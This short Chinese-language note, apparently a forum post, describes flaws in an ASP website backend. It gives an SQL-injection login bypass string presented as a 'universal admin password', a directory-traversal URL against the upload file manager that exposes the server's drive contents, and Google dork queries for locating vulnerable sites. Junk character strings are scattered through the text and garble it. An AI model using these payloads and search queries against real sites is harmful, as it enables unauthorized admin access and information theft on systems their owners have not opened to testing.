后台万能密码 'or'='or'
1 x5 O* ^0 T" x; S6 |$ k- ?" s1 v
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
b0 d* U' f- Y% Z6 X) Vadmin/uploadfile.asp?currentFolder=/upfiles/../& H6 P; i2 n+ e0 O _- B& X" x
& k* f/ T2 r' ?漏洞证明:- m9 I! v; Q" p3 m4 R" Q7 r7 ]
: M% L$ k/ k" p
谷歌:inurl:type.asp?id=1 新闻中心7 U& z: a% X1 z( ]
或者 :inurl:download_ok.asp?
3 ~9 K" e: K; v) w! P a% w
( o, ]2 a1 j7 _ |